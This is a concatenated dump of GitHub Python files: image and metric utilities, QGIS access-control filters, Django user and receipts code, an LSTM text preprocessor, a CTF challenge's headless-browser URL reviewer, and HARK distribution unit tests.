dst.paste(im2, (0, im1.height))\n return dst\n\n\ndef os2od(img, mod: str = \"L\"):\n width, height = img.size\n im1 = img.crop((0, 0, width, height // 2))\n im2 = img.crop((0, height // 2, width, height))\n return get_concat_v(im2, im1, mod).transpose(Image.Transpose.FLIP_TOP_BOTTOM)\n\n\ndef os2od_list(images: list, mod: str = \"L\"):\n images = [os2od(x, mod) for x in images]\n return images\n\n\ndef array2image(array, mode: str = \"L\"):\n return Image.fromarray(array, mode=mode)\n\n\ndef image2array(array):\n return np.array(array)\n\n\ndef image2tensor(img):\n t = transforms.ToTensor()\n return t(img)\n\n\ndef array2tensor(array):\n return torch.tensor(array)\n\n\ndef arrayHStack(array_li: list):\n return np.concatenate(array_li, axis=1)\n\n\ndef arrayVStack(array_li: list):\n return np.concatenate(array_li, axis=0)\n\n\nclass FetchAllData():\n def __init__(self, mod_symbol: str, root_path: str, posi_symbol: str, nega_symbol: str, resize_to: int = 224):\n\n self.mod_symbol = mod_symbol\n self.root_path = root_path\n self.posi_symbol = posi_symbol\n self.nega_symbol = nega_symbol\n self.trans = transforms.Compose([\n transforms.Resize((resize_to, resize_to)),\n transforms.ToTensor(),\n ])\n\n self.NameAndLabel = self.make_dataset()\n\n def make_dataset(self):\n tmp = [x for x in glob.glob(self.root_path + \"/**/*.*\", recursive=True) if self.mod_symbol in x and \"3x3\" in x]\n posi_li = [[Image.open(x).convert(\"L\"), 1] for x in tmp if self.posi_symbol in x]\n nega_li = [[Image.open(x).convert(\"L\"), 0] for x in tmp if self.nega_symbol in x]\n\n return posi_li + nega_li\n\n def fetch(self):\n return self.NameAndLabel\n\n\ndef abbr(full_list: list):\n abbr = \"\"\n for x in full_list:\n abbr += x[0]\n return abbr\n\n\ndef abbr_double(full_list: list):\n dist = \"SVC-DVC-CC\"\n abbr = \"\"\n for x in full_list[0]:\n abbr += dist[x]\n if len(full_list) == 2 and len(full_list[1]) != 0:\n abbr += \"x\"\n for x in full_list[1]:\n abbr += dist[x]\n return abbr\n\n\ndef read_txt_polar(txt_path: str):\n center_x = center_y = radius = 0\n with open(txt_path, 'r') as f:\n center_x, center_y, radius = f.readlines()\n center_x, center_y, radius = int(center_x.strip(\"\\n\")), int(center_y.strip(\"\\n\")), int(radius.strip(\"\\n\"))\n\n return center_x, center_y, radius\n\n\ndef trans2polar(img: Image, center_x: int, center_y: int, is_drop: bool = False):\n\n img: Image = img.copy()\n\n width, height = img.size\n if is_drop:\n r = int(\n min(-(center_x - height) if (center_x - 0.5 * height) >= 0 else (center_x), -(center_y - width) if\n (center_y - 0.5 * width) >= 0 else (center_y)))\n else:\n x, y = center_x, center_y\n r = int(\n math.sqrt(\n max((x * x + y * y), (x * x + (width - y) * (width - y)), ((height - x) * (height - x) + y * y),\n ((height - x) * (height - x) + (width - y) * (width - y)))))\n\n circumference = int(math.pi * 2 * r)\n\n canvas = Image.new('L', (r, circumference), (100))\n canvas_array = np.array(canvas)\n img_array = np.array(img)\n\n # print(width, height, r, circumference)\n\n for r_ in range(r):\n for l_ in range(circumference // 1):\n\n theta_ = l_ / r if r_ != 0 else 0\n X = int(math.floor(r_ * math.cos(theta_))) + center_x\n Y = int(math.ceil(r_ * math.sin(theta_))) + center_y\n\n if X in range(height) and Y in range(width):\n pixel = img_array[X][Y]\n else:\n pixel = 150\n\n canvas_array[l_][r_] = pixel\n\n canvas = Image.fromarray(canvas_array)\n return canvas\n\n\ndef restore_plot_from_record(vis: RedundancyVisualizer, save_path: str, column: int = 1):\n try:\n for i in range(1, 6):\n csv_path = os.path.join(save_path, \"csv\", str(i), \"Record_acc_auc_kappa.csv\")\n data = pd.read_csv(csv_path, encoding='utf-8', header=None).values\n for x in data:\n vis.plot('Test_AUC_' + str(i), float(x[column]))\n except:\n _ = 1\n\n\ndef restore_all_plot_from_record(env_name_li: list, cfg: ConfigBase):\n for env_name in env_name_li:\n\n vis = RedundancyVisualizer(env=str(env_name).replace(\"save/\", \"\").replace(\"./\", \"\").replace(\"/\", \"_\"),\n servers=cfg.vis_servers,\n port=cfg.vis_port)\n save_path = os.path.join(\"./save\" if \"save/\" not in env_name else \"./\", env_name)\n\n restore_plot_from_record(vis=vis, save_path=save_path)\n try:\n AvgPlot(to_=cfg.stop_epoch).vis_plot(result_list=[save_path], title=\"AVERAGE_PLOT\", vis=vis)\n except:\n print(\"ERROR AvgPlot:\" + env_name)\n\n\nclass AvgMax(object):\n def __init__(self, save_path: str):\n self.precision: str = \".4f\"\n self.max_acc_li = []\n self.max_auc_li = []\n self.max_kap_li = []\n self.avg_max_acc = 0\n self.avg_max_auc = 0\n self.avg_max_kap = 0\n self.save_path = save_path\n Path(save_path).mkdir(parents=True, exist_ok=True)\n\n def calculate(self):\n self.avg_max_acc = format(mean(self.max_acc_li), self.precision)\n self.std_max_acc = format(np.std(self.max_acc_li, ddof=1), self.precision)\n\n self.avg_max_auc = format(mean(self.max_auc_li), self.precision)\n self.std_max_auc = format(np.std(self.max_auc_li, ddof=1), self.precision)\n\n self.avg_max_kap = format(mean(self.max_kap_li), self.precision)\n self.std_max_kap = format(np.std(self.max_kap_li, ddof=1), self.precision)\n\n return self.avg_max_acc, self.avg_max_auc, self.avg_max_kap\n\n def save(self):\n self.max_acc_li += [self.avg_max_acc, self.std_max_acc]\n self.max_auc_li += [self.avg_max_auc, self.std_max_auc]\n self.max_kap_li += [self.avg_max_kap, self.std_max_kap]\n save_path = os.path.join(self.save_path, \"avg_std_max.csv\")\n Path(save_path).touch(exist_ok=True)\n with open(save_path, \"w\") as f:\n writer = csv.writer(f)\n head_line = [\"name\"] + [x + 1 for x in range(len(self.max_acc_li) - 2)] + [\"avg\", \"std\"]\n\n writer.writerow(head_line)\n writer.writerow([\"max_acc\"] + self.max_acc_li)\n writer.writerow([\"max_auc\"] + self.max_auc_li)\n writer.writerow([\"max_kap\"] + self.max_kap_li)\n\n def add(self, tp):\n try:\n max_acc = tp.record_best_acc.MAX_ACC\n max_auc = tp.record_best_auc.MAX_AUC\n max_kap = tp.record_best_kap.MAX_KAP\n\n self.add_value(max_acc, max_auc, max_kap)\n\n except:\n _ = 1\n return self\n\n def add_value(self, max_acc, max_auc, max_kap):\n try:\n max_acc = float(format(max_acc, self.precision))\n max_auc = float(format(max_auc, self.precision))\n max_kap = float(format(max_kap, self.precision))\n\n self.max_acc_li.append(max_acc)\n self.max_auc_li.append(max_auc)\n self.max_kap_li.append(max_kap)\n\n except:\n _ = 1\n return self\n\n def conclusion(self):\n avg_acc, avg_auc, _ = self.calculate()\n self.save()\n return avg_acc, avg_auc\n\n\ndef restore_avg_max_from_record(env_name_li: list):\n for env_name in env_name_li:\n save_path = os.path.join(\"./save\" if \"save/\" not in env_name else \"./\", env_name)\n avg_max = AvgMax(save_path=save_path)\n # try:\n for i in range(1, 6):\n try:\n max_acc, max_auc, max_kap = 0., 0., 0.\n csv_path = os.path.join(save_path, \"csv\", str(i), \"Record_acc_auc_kappa.csv\")\n data = pd.read_csv(csv_path, encoding='utf-8', header=None).values\n for x in data[VALID_START_POINT:]:\n acc, auc, kap = float(x[0]), float(x[1]), float(x[2])\n max_acc = acc if acc > max_acc else max_acc\n max_auc = auc if auc > max_auc else max_auc\n max_kap = kap if kap > max_kap else max_kap\n\n avg_max.add_value(max_acc, max_auc, max_kap)\n except:\n _ = 1\n\n # avg_max.add_value(max_acc, max_auc, max_kap)\n\n avg_max.conclusion()\n\n # except:\n # _ = 1\n\n\ndef gen_csv_report_from_record(env_name_li: list):\n save_path = os.path.join(\"./report\", time.strftime(\"%Y-%m-%d_%H.%M.%S\", time.localtime()) + \"_report.csv\")\n Path(save_path).parent.mkdir(parents=True, exist_ok=True)\n Path(save_path).touch(exist_ok=True)\n with open(save_path, \"w\") as f:\n writer = csv.writer(f)\n head_line = [\"Index\", \"Environment\", \"ACC\", \"ACC_STD\", \"AUC\", \"AUC_STD\", \"Kappa\", \"Kappa_STD\", \"Remark\"]\n writer.writerow(head_line)\n\n for i, env_name in enumerate(env_name_li):\n avg_max_path = os.path.join(\"./save\" if \"save/\" not in env_name else \"./\", env_name)\n csv_path = os.path.join(avg_max_path, \"avg_std_max.csv\")\n\n data = pd.read_csv(csv_path, encoding='utf-8').values\n acc, acc_std, auc, auc_std, kpa, kpa_std = data[0][-2], data[0][-1], data[1][-2], data[1][-1], data[2][-2], data[2][\n -1]\n\n writer.writerow([int(i + 1), env_name] + [acc, acc_std, auc, auc_std, kpa, kpa_std])\n\n\ndef mode_trans(cam_weight, mode: int = 8):\n '''\n mode = 1 : IE\n mode = 4 : ETDRS\n mode = -4: hemispheric\n mode = 8 : SubETDRS\n '''\n if mode == 1:\n for i in [0, 1, 2]:\n cam_weight[:, i] = np.mean(cam_weight, axis=0)[i]\n return cam_weight\n\n if mode == 4:\n for line in [0, 2, 4, 6]:\n for i in [0, 1, 2]:\n l_1, l_2 = (line + 2) % 8, (line + 1) % 8\n cam_weight[l_2][i] = (cam_weight[l_2][i] + cam_weight[l_1][i]) / 2\n cam_weight[l_1][i] = cam_weight[l_2][i]\n return cam_weight\n\n if mode == -4:\n for line in [0, 2, 4, 6]:\n for i in [0, 1, 2]:\n l_1, l_2 = (line + 1) % 8, (line + 0) % 8\n cam_weight[l_2][i] = (cam_weight[l_2][i] + cam_weight[l_1][i]) / 2\n cam_weight[l_1][i] = cam_weight[l_2][i]\n return cam_weight\n\n if mode == 8:\n return cam_weight\n\n return cam_weight\n\n\ndef norm_npy(x, U=None):\n U = x[:, 1:] if U is None else U[:, 1:]\n\n x -= U.min()\n U -= U.min()\n\n x /= U.max()\n return x\n\n\ndef npy_cam_fusion(env, epoch_li, mode: int = 8, is_relative: bool = True, is_draw_bound: bool = False):\n npy_path_li = [[\n \"{}/weight_cam/{}/epoch_{}_8_{}.npy\".format(env, fold + 1, epoch, index) for fold, epoch in enumerate(epoch_li)\n ] for index in [0, 1, 2]]\n npy_li = [np.array([np.load(x) for x in npy_path_li[index]]).sum(axis=0) for index in [0, 1, 2]]\n\n npy_li = [norm_npy(x) for x in npy_li] if is_relative else [norm_npy(x, np.array(npy_li)) for x in npy_li]\n\n [\n draw_weight_cam(x, is_draw_bound=is_draw_bound, mode=mode).save(\"{}/m{}_r{}_i{}.png\".format(env, mode, is_relative, i))\n for i, x in enumerate(npy_li)\n ]\n\n return npy_li\n\n\ndef draw_weight_cam(cam_weight, is_draw_bound: bool = False, mode: int = 8):\n line_color: str = \"green\"\n\n image = Image.new('RGB', (224, 224))\n draw_obj = ImageDraw.Draw(image)\n # colormap = matplotlib.colormaps['jet']\n colormap = matplotlib.cm.get_cmap(\"jet\")\n\n cam_weight = mode_trans(cam_weight=cam_weight, mode=mode)\n\n cam_weight = colormap(cam_weight)\n cam_weight = np.uint8(cam_weight * 255)\n\n for i, line in enumerate([7, 6, 5, 4, 3, 2, 1, 0]):\n color1 = (0, 0, 0)\n color2 = tuple(cam_weight[line][1])\n color3 = tuple(cam_weight[line][2])\n\n draw_obj.pieslice((0, 0, 224, 224), start=-45 * (i + 1), end=-45 * i, fill=color3)\n draw_obj.pieslice((112 - 2 * 37, 112 - 2 * 37, 112 + 2 * 37, 112 + 2 * 37),\n start=-45 * (i + 1),\n end=-45 * i,\n fill=color2)\n draw_obj.pieslice((112 - 0.78 * 37, 112 - 0.78 * 37, 112 + 0.78 * 37, 112 + 0.78 * 37), start=0, end=365, fill=color1)\n\n if is_draw_bound:\n draw_obj.ellipse((0, 0, 224, 224), outline=line_color, width=2)\n draw_obj.ellipse((112 - 2 * 37, 112 - 2 * 37, 112 + 2 * 37, 112 + 2 * 37), outline=line_color)\n draw_obj.ellipse((112 - 1 * 37, 112 - 1 * 37, 112 + 1 * 37, 112 + 1 * 37), outline=line_color)\n\n draw_obj.line((33, 33, 224 - 33, 224 - 33), line_color)\n draw_obj.line((224 - 33, 33, 33, 224 - 33), line_color)\n\n if mode == 8:\n draw_obj.line((0, 112, 224, 112), line_color)\n draw_obj.line((112, 0, 112, 224), line_color)\n\n return image\n","repo_name":"iAaronLau/Polar-Net-Pytorch","sub_path":"tools/utils_pack.py","file_name":"utils_pack.py","file_ext":"py","file_size_in_byte":20818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2499908744","text":"# coding=utf-8\n\"\"\"\"Single layer constraints\n\n.. note:: This program is free software; you can redistribute it and/or modify\n it under the terms of the Mozilla Public License 2.0.\n\n\"\"\"\n\n__author__ = 'elpaso@itopen.it'\n__date__ = '2020-04-15'\n__copyright__ = 'Copyright 2020, Gis3W'\n\n\nfrom qgis.server import QgsAccessControlFilter\nfrom qgis.core import QgsMessageLog, Qgis\nfrom qdjango.apps import QGS_SERVER\nfrom qdjango.models import ConstraintSubsetStringRule, ConstraintExpressionRule, Layer\n\nclass SingleLayerSubsetStringAccessControlFilter(QgsAccessControlFilter):\n \"\"\"A filter that sets a subset string from the layer constraints\"\"\"\n\n def __init__(self, server_iface):\n super().__init__(server_iface)\n\n def layerFilterSubsetString(self, layer):\n \"\"\"Retrieve and sets user layer constraints\"\"\"\n\n try:\n qdjango_layer = Layer.objects.get(project=QGS_SERVER.project, qgs_layer_id=layer.id())\n except Layer.DoesNotExist:\n return \"\"\n\n rule = ConstraintSubsetStringRule.get_rule_definition_for_user(QGS_SERVER.user, qdjango_layer.pk)\n QgsMessageLog.logMessage(\"SingleLayerSubsetStringAccessControlFilter rule for user %s and layer id %s: %s\" % (QGS_SERVER.user, layer.id(), rule), \"\", Qgis.Info)\n return rule\n\n\n\n# Register the filter, keep a reference because of the garbage collector\nac_filter = SingleLayerSubsetStringAccessControlFilter(QGS_SERVER.serverInterface())\n# Note: this should be the last filter, set the priority to 10000\nQGS_SERVER.serverInterface().registerAccessControl(ac_filter, 10000)\n\n\nclass SingleLayerExpressionAccessControlFilter(QgsAccessControlFilter):\n \"\"\"A filter that sets an expression filter from the layer constraints\"\"\"\n\n def __init__(self, server_iface):\n super().__init__(server_iface)\n\n def layerFilterExpression(self, layer):\n \"\"\"Retrieve and sets user layer constraints\"\"\"\n\n try:\n qdjango_layer = Layer.objects.get(project=QGS_SERVER.project, qgs_layer_id=layer.id())\n except Layer.DoesNotExist:\n return \"\"\n\n rule = ConstraintExpressionRule.get_rule_definition_for_user(QGS_SERVER.user, qdjango_layer.pk)\n QgsMessageLog.logMessage(\"SingleLayerExpressionAccessControlFilter rule for user %s and layer id %s: %s\" % (QGS_SERVER.user, layer.id(), rule), \"\", Qgis.Info)\n return rule\n\n\n# Register the filter, keep a reference because of the garbage collector\nac_filter2 = SingleLayerExpressionAccessControlFilter(QGS_SERVER.serverInterface())\nQGS_SERVER.serverInterface().registerAccessControl(ac_filter2, 9999)\n","repo_name":"pblottiere/g3w-admin","sub_path":"g3w-admin/qdjango/server_filters/accesscontrol/constraints.py","file_name":"constraints.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"28702335419","text":"import functools\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\n\nfrom users.mixins import PhoneNumberMixin\nfrom users.utils import get_random_str\n\nauthorization_code_generator = functools.partial(get_random_str, 2)\ninvite_code_generator = functools.partial(get_random_str, 3)\n\n\nclass User(PhoneNumberMixin, AbstractUser):\n invite_code = models.CharField(\n max_length=6,\n default=invite_code_generator,\n unique=True,\n verbose_name='Invite code',\n help_text='Invite code',\n )\n invited_by = models.ForeignKey(\n 'self',\n on_delete=models.SET_NULL,\n related_name='invitees',\n null=True,\n blank=True,\n verbose_name='Invited by',\n help_text='Invited by',\n )\n\n class Meta:\n verbose_name = 'User'\n verbose_name_plural = 'Users'\n ordering = ('-pk',)\n\n def __str__(self):\n return f'User <{self.username}> ({self.phone_number})'\n\n def save(self, *args, **kwargs):\n if self.invited_by and self.invited_by.phone_number == self.phone_number:\n raise ValidationError('Self invitation prohibited.')\n super().save(*args, **kwargs)\n\n\nclass AuthorizationAttempt(PhoneNumberMixin):\n authorization_code = models.CharField(\n max_length=4,\n default=authorization_code_generator,\n unique=True,\n verbose_name='Authorization code',\n help_text='Authorization code',\n )\n\n class Meta:\n verbose_name = 'Authorization attempt'\n verbose_name_plural = 'Authorization attempts'\n ordering = ('-pk',)\n\n def __str__(self):\n return f'Authorization attempt ({self.phone_number})'\n","repo_name":"AlexanderUp/simple_referal_system","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43558782994","text":"import numpy\nfrom tensorflow.keras.utils import to_categorical\n\n\n# Parses the text, map unique chars to integers and provides a dictionary to convert char2int and int2char\ndef Parse(txt):\n chars = sorted(list(set(txt)))\n char2int = dict((c, i) for i, c in enumerate(chars))\n int2char = dict((i, c) for i, c in enumerate(chars))\n \n nChars = len(txt)\n nAlpha = len(chars)\n convDict = {\"char2int\": char2int, \"int2char\": int2char}\n return convDict, nChars, nAlpha\n\n\n# Preprocess for LSTM (seqSize = sentence size)\ndef Preprocess(txt, seqSize, nChars, nAlpha, char2int):\n dataX = []\n dataY = []\n for i in range(0, nChars - seqSize, 1):\n seqIn = txt[i:i + seqSize]\n seqOut = txt[i + seqSize]\n dataX.append([char2int[char] for char in seqIn])\n dataY.append(char2int[seqOut])\n nPats = len(dataX)\n print (\"Total Patterns: \", nPats)\n \n X = numpy.reshape(dataX, (nPats, seqSize, 1))\n # normalize by alphabet size\n X = X / float(nAlpha)\n # Convert dataY to binary class matrix\n y = to_categorical(dataY)\n return X, y , dataX\n","repo_name":"miltonluaces/problem_solving","sub_path":"NLP/IV_Analysis/TextForecasting/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"22236742784","text":"from selenium import webdriver\nimport time, logging\n\ndef view_meme(url: str):\n chrome_args = [\n '--headless',\n\t\t'--no-sandbox',\n '--disable-dev-shm-usage',\n\t\t'--disable-background-networking',\n\t\t'--disable-default-apps',\n\t\t'--disable-extensions',\n\t\t'--disable-gpu',\n\t\t'--disable-sync',\n\t\t'--disable-translate',\n\t\t'--hide-scrollbars',\n\t\t'--metrics-recording-only',\n\t\t'--mute-audio',\n\t\t'--no-first-run',\n\t\t'--safebrowsing-disable-auto-update',\n\t\t'--js-flags=--noexpose_wasm,--jitless'\n\t]\n\n chrome_options = webdriver.ChromeOptions()\n \n for arg in chrome_args:\n chrome_options.add_argument(arg)\n\n driver = None\n\n try:\n driver = webdriver.Chrome(chrome_options=chrome_options)\n driver.get(url)\n time.sleep(10)\n except Exception as e:\n logging.error(e)\n finally:\n if not driver is None:\n driver.quit()","repo_name":"uwa-iss/public-uwactf-challenges-2022","sub_path":"web/memedb/challenge/app/reviewer.py","file_name":"reviewer.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"19"} +{"seq_id":"34198896127","text":"import cv2\r\nimport mediapipe as mp\r\nmp_drawing = mp.solutions.drawing_utils\r\nimport colors as mp_drawing_styles\r\nmp_hands = mp.solutions.hands\r\nfrom KeyPresses import sendKey, holdDown, letUp\r\nfrom WindowSetup import get_application\r\n\r\n#app = get_application(\"notepad.exe\")\r\napp = get_application()\r\n\r\n# starting positions are unpressed\r\nrightPressed = False\r\nleftPressed = False\r\nupPressed = False\r\ndownPressed = False\r\n\r\n# key values to send to game\r\nrightKey = \"d\"\r\nleftKey = \"a\"\r\ndownKey = \"s\"\r\nupKey = \"w\"\r\n\r\n# For webcam input:\r\ncap = cv2.VideoCapture(0)\r\nwith mp_hands.Hands(\r\n model_complexity=0,\r\n min_detection_confidence=0.5,\r\n min_tracking_confidence=0.5) as hands:\r\n\r\n if cap.isOpened():\r\n height, width, channels = cap.read()[1].shape\r\n while cap.isOpened():\r\n success, image = cap.read()\r\n if not success:\r\n print(\"Ignoring empty camera frame.\")\r\n # If loading a video, use 'break' instead of 'continue'.\r\n continue\r\n\r\n # To improve performance, optionally mark the image as not writeable to\r\n # pass by reference.\r\n image.flags.writeable = False\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n results = hands.process(image)\r\n\r\n # Draw the hand annotations on the image.\r\n image.flags.writeable = True\r\n\r\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\r\n if results.multi_hand_landmarks:\r\n\r\n control_hand = results.multi_hand_landmarks[-1]\r\n\r\n # do controls here\r\n\r\n # up/down\r\n if control_hand.landmark[12].y < .1: # up\r\n if not upPressed:\r\n holdDown(app, upKey)\r\n upPressed = True\r\n else:\r\n if upPressed:\r\n letUp(app, upKey)\r\n upPressed = False\r\n\r\n if control_hand.landmark[9].y > .8: # down\r\n if not downPressed:\r\n holdDown(app, downKey)\r\n downPressed = True\r\n else:\r\n if downPressed:\r\n letUp(app, downKey)\r\n downPressed = False\r\n\r\n # right/left\r\n if control_hand.landmark[9].x < .2: # right\r\n if not rightPressed:\r\n holdDown(app, rightKey)\r\n rightPressed = True\r\n else:\r\n if rightPressed:\r\n letUp(app, rightKey)\r\n rightPressed = False\r\n\r\n if control_hand.landmark[9].x > .8: # left\r\n if not leftPressed:\r\n holdDown(app, leftKey)\r\n leftPressed = True\r\n else:\r\n if leftPressed:\r\n letUp(app, leftKey)\r\n leftPressed = False\r\n\r\n\r\n mp_drawing.draw_landmarks(\r\n image,\r\n control_hand,\r\n mp_hands.HAND_CONNECTIONS,\r\n mp_drawing_styles.get_default_hand_landmarks_style(),\r\n mp_drawing_styles.get_default_hand_connections_style())\r\n\r\n if results.multi_hand_landmarks and len(results.multi_hand_landmarks) > 1:\r\n for hand_landmarks in results.multi_hand_landmarks[:-1]:\r\n mp_drawing.draw_landmarks(\r\n image,\r\n hand_landmarks,\r\n mp_hands.HAND_CONNECTIONS,\r\n mp_drawing_styles.get_faded_hand_landmarks_style(),\r\n mp_drawing_styles.get_faded_hand_connections_style())\r\n\r\n # Flip the image horizontally for a selfie-view display.\r\n cv2.imshow('MediaPipe Hands', cv2.flip(image, 1))\r\n if cv2.waitKey(5) & 0xFF == 27:\r\n break\r\ncap.release()\r\n","repo_name":"rwbxd/handController","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71561661220","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, HttpResponseServerError\nfrom .models import Receipts, Item\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom _datetime import datetime\nfrom django.core.serializers import serialize\nfrom .processors import sync as sync_processor\nfrom oauth.credentials import google_credentials\n\nimport base64\n\n\nimport json\n\ndef index(request):\n return render(request, 'receipts/receipts.html')\n\ndef pickup(request):\n return render(request, 'receipts/pickup.html')\n\n@csrf_exempt\ndef pickup_endpoint(request):\n def parse_json():\n received_json_data=json.loads(request.body.decode('utf-8'))\n raw = received_json_data['raw_content']\n name = received_json_data['name']\n user = received_json_data['user']\n return user, name, raw\n\n def parse_form():\n raw = request.POST['raw_content']\n name = request.POST['name']\n user = request.POST['user']\n return user, name, raw\n\n try:\n user, name, raw = parse_json()\n except Exception as e1:\n try:\n user, name, raw = parse_form()\n except Exception as e2:\n print(e1)\n print(e2)\n\n rc = base64.urlsafe_b64decode(raw).decode('unicode_escape')\n rdate = datetime.strptime(rc.split(\"\\r\\n\")[2].strip(), '%a, %d %b %Y %H:%M:%S %z (%Z)')\n r = Receipts(receipts_name=name, receipts_date=rdate, raw_content=rc, user=user)\n r.save()\n # Always return an HttpResponseRedirect after successfully dealing\n # with POST data. This prevents data from being posted twice if a\n # user hits the Back button.\n return HttpResponseRedirect(reverse('receipts:pickup'))\n\n\ndef search_receipts(request):\n \"\"\"\n Searches all receipts. This is a POST method, accept JSON data only.\n \"\"\"\n received_json_data=json.loads(request.body.decode('utf-8'))\n print(received_json_data)\n\n filter_p = {'invalid': False}\n if 'name' in received_json_data:\n filter_p['receipts_name__startswith']=received_json_data['name']\n if 'from' in received_json_data:\n filter_p['receipts_date__gt']=received_json_data['from']\n if 'to' in received_json_data:\n filter_p['receipts_date__lt']=received_json_data['to']\n\n order_by = received_json_data['order_by'] if 'order_by' in received_json_data else '-receipts_date'\n page_start = received_json_data['page_start'] if 'page_start' in received_json_data else 0\n page_size = received_json_data['page_size'] if 'page_size' in received_json_data else 1000000\n\n receipts_list = Receipts.objects.filter(**filter_p).order_by('-receipts_date')[page_start:page_start + page_size]\n data_s = json.loads(serialize('json', receipts_list, fields=('receipts_name', 'receipts_date', 'total_price')))\n\n def to_json_line(r):\n j = r['fields']\n j['id'] = r['pk']\n return j\n\n data = list(map(to_json_line,data_s))\n return JsonResponse({'payload': data})\n\n\ndef get_detail(request, receipts_id):\n items = Item.objects.filter(receipts_id=receipts_id)\n data_s = json.loads(serialize('json', items))\n\n def to_json_line(i):\n j = i['fields']\n j['id'] = i['pk']\n return j\n\n data = list(map(to_json_line,data_s))\n return JsonResponse({'payload': data})\n\n\ndef get_raw(request, receipts_id):\n receipts = Receipts.objects.get(pk=receipts_id)\n return JsonResponse({'payload': receipts.raw_content})\n\n\ndef sync(request):\n if 'google_user' not in request.session or request.session['google_user'] not in google_credentials:\n return HttpResponseServerError('Please login first')\n\n user = request.session['google_user']\n sync_processor.sync(user)\n return HttpResponse('Success')\n\n\n","repo_name":"dsalimao/ali-frontend","sub_path":"receipts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43788972120","text":"import unittest\n\nimport numpy as np\nimport xarray as xr\n\nfrom HARK.distribution import (\n Bernoulli,\n DiscreteDistribution,\n DiscreteDistributionLabeled,\n IndexDistribution,\n Lognormal,\n MarkovProcess,\n MeanOneLogNormal,\n MVNormal,\n Normal,\n Uniform,\n Weibull,\n calc_expectation,\n calc_lognormal_style_pars_from_normal_pars,\n calc_normal_style_pars_from_lognormal_pars,\n combine_indep_dstns,\n distr_of_function,\n expected,\n)\nfrom HARK.tests import HARK_PRECISION\n\n\nclass DiscreteDistributionTests(unittest.TestCase):\n \"\"\"\n Tests for distribution.py sampling distributions\n with default seed.\n \"\"\"\n\n def test_draw(self):\n self.assertEqual(\n DiscreteDistribution(np.ones(1), np.zeros(1)).draw(1)[0],\n 0,\n )\n\n def test_distr_of_function(self):\n # Function 1 -> 1\n # Approximate the lognormal expectation\n sig = 0.05\n norm = Normal(mu=-(sig**2) / 2, sigma=sig).discretize(131, method=\"hermite\")\n my_logn = distr_of_function(norm, func=lambda x: np.exp(x))\n exp = calc_expectation(my_logn)\n self.assertAlmostEqual(exp, 1.0)\n\n # Function 1 -> n\n # Mean and variance of the normal\n norm = Normal(mu=0.0, sigma=1.0).discretize(5, method=\"hermite\")\n moments = distr_of_function(norm, lambda x: np.array([x, x**2]))\n exp = calc_expectation(moments).flatten()\n self.assertAlmostEqual(exp[0], 0.0)\n self.assertAlmostEqual(exp[1], 1.0)\n\n # Function n -> 1\n # Expectation of the sum of two independent normals\n mu_a, mu_b = 1.0, 2.0\n si_a, si_b = 3.0, 4.0\n norm_a = Normal(mu=mu_a, sigma=si_a).discretize(5, method=\"hermite\")\n norm_b = Normal(mu=mu_b, sigma=si_b).discretize(5, method=\"hermite\")\n binorm = combine_indep_dstns(norm_a, norm_b)\n mysum = distr_of_function(binorm, lambda x: np.sum(x))\n exp = calc_expectation(mysum)\n self.assertAlmostEqual(exp[0], mu_a + mu_b)\n\n # Function n -> m\n # Mean and variance of two normals\n moments = distr_of_function(\n binorm,\n lambda x: np.array([x[0], (x[0] - mu_a) ** 2, x[1], (x[1] - mu_b) ** 2]),\n )\n exp = calc_expectation(moments)\n self.assertAlmostEqual(exp[0], mu_a)\n self.assertAlmostEqual(exp[1], si_a**2)\n self.assertAlmostEqual(exp[2], mu_b)\n self.assertAlmostEqual(exp[3], si_b**2)\n\n def test_calc_expectation(self):\n dd_0_1_20 = Normal().discretize(20, method=\"hermite\")\n dd_1_1_40 = Normal(mu=1).discretize(40, method=\"hermite\")\n dd_10_10_100 = Normal(mu=10, sigma=10).discretize(100, method=\"hermite\")\n\n ce1 = calc_expectation(dd_0_1_20)\n ce2 = calc_expectation(dd_1_1_40)\n ce3 = calc_expectation(dd_10_10_100)\n\n self.assertAlmostEqual(ce1[0], 0.0)\n self.assertAlmostEqual(ce2[0], 1.0)\n self.assertAlmostEqual(ce3[0], 10.0)\n\n ce4 = calc_expectation(dd_0_1_20, lambda x: 2**x)\n\n self.assertAlmostEqual(ce4[0], 1.27154, places=HARK_PRECISION)\n\n ce5 = calc_expectation(dd_1_1_40, lambda x: 2 * x)\n\n self.assertAlmostEqual(ce5[0], 2.0)\n\n ce6 = calc_expectation(dd_10_10_100, lambda x, y: 2 * x + y, 20)\n\n self.assertAlmostEqual(ce6[0], 40.0)\n\n ce7 = calc_expectation(\n dd_0_1_20, lambda x, y: x + y, np.hstack(np.array([0, 1, 2, 3, 4, 5]))\n )\n\n self.assertAlmostEqual(ce7.flat[3], 3.0)\n\n PermShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n TranShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n IncShkDstn = combine_indep_dstns(PermShkDstn, TranShkDstn)\n\n ce8 = calc_expectation(IncShkDstn, lambda atoms: atoms[0] + atoms[1])\n\n self.assertAlmostEqual(ce8, 2.0)\n\n ce9 = calc_expectation(\n 